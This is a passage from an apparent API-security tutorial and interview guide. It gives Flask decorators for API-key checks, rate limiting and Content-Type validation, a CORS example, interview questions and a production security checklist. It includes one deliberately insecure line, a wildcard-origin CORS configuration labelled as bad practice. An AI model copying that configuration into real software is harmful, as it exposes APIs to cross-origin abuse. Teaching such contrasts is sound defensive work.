            request.api_key_info = self.api_keys[api_key]

            return f(*args, **kwargs)

        return decorated

    def rate_limit(self, max_requests: int, window_seconds: int):
        """
        Rate limiting decorator

        Usage: @rate_limit(max_requests=100, window_seconds=60)

        Prevents abuse and DDoS attacks
        """
        def decorator(f):
            @wraps(f)
            def decorated(*args, **kwargs):
                # Get client identifier (API key, IP, user ID)
                client_id = request.headers.get('X-API-Key') or request.remote_addr

                current_time = time.time()
                key = f"{client_id}:{f.__name__}"

                # Get request history
                if key not in self.rate_limiter:
                    self.rate_limiter[key] = []

                # Remove old requests outside window
                self.rate_limiter[key] = [
                    t for t in self.rate_limiter[key]
                    if current_time - t < window_seconds
                ]

                # Check if limit exceeded
                if len(self.rate_limiter[key]) >= max_requests:
                    return jsonify({
                        'error': 'Rate limit exceeded',
                        'retry_after': window_seconds
                    }), 429

                # Record this request
                self.rate_limiter[key].append(current_time)

                return f(*args, **kwargs)

            return decorated
        return decorator

    def validate_content_type(self, expected_type: str):
        """
        Validate Content-Type header

        Prevents attacks that exploit content type confusion
        """
        def decorator(f):
            @wraps(f)
            def decorated(*args, **kwargs):
                content_type = request.headers.get('Content-Type', '')

                if not content_type.startswith(expected_type):
                    return jsonify({
                        'error': f'Content-Type must be {expected_type}'
                    }), 415

                return f(*args, **kwargs)

            return decorated
        return decorator


# Usage example
security = APISecurityManager()

@app.route('/api/data')
@security.require_api_key
@security.rate_limit(max_requests=100, window_seconds=60)
@security.validate_content_type('application/json')
def get_data():
    """Secured API endpoint"""
    return jsonify({'data': 'sensitive information'})


# CORS Security
from flask_cors import CORS

# ❌ BAD: Allow all origins
CORS(app, origins="*")  # Insecure!

# ✅ GOOD: Whitelist specific origins
CORS(app, origins=[
    "https://trusted-domain.com",
    "https://app.trusted-domain.com"
])

8. Interview Tips

Key Security Concepts to Know:
Common Interview Questions:
  1. "How would you implement authentication for a REST API?" → JWT with refresh tokens
  2. "Explain OAuth 2.0 Authorization Code flow" → Know all 6 steps
  3. "How do you prevent SQL injection?" → Parameterized queries
  4. "What's the difference between authentication and authorization?" → Identity vs permissions
  5. "How do JWTs work? What are the parts?" → Header.Payload.Signature
  6. "How do you securely store passwords?" → bcrypt/Argon2 with salt
  7. "What is CSRF and how do you prevent it?" → Tokens or SameSite cookies
  8. "Explain XSS and mitigation strategies" → Escape output, CSP, sanitize input
Security Red Flags in Interviews:
Production Security Checklist:
  1. ✅ Use HTTPS everywhere (enforce with HSTS)
  2. ✅ Implement proper authentication (OAuth 2.0 / OIDC)
  3. ✅ Hash passwords with bcrypt/Argon2 (never plaintext)
  4. ✅ Use parameterized queries (prevent SQL injection)
  5. ✅ Escape output / sanitize input (prevent XSS)
  6. ✅ Implement CSRF protection (tokens or SameSite)
  7. ✅ Set security headers (CSP, HSTS, X-Frame-Options)
  8. ✅ Rate limit APIs (prevent abuse)
  9. ✅ Validate all input (never trust client)
  10. ✅ Keep dependencies updated (patch vulnerabilities)
  11. ✅ Log security events (audit trail)
  12. ✅ Use principle of least privilege (minimal permissions)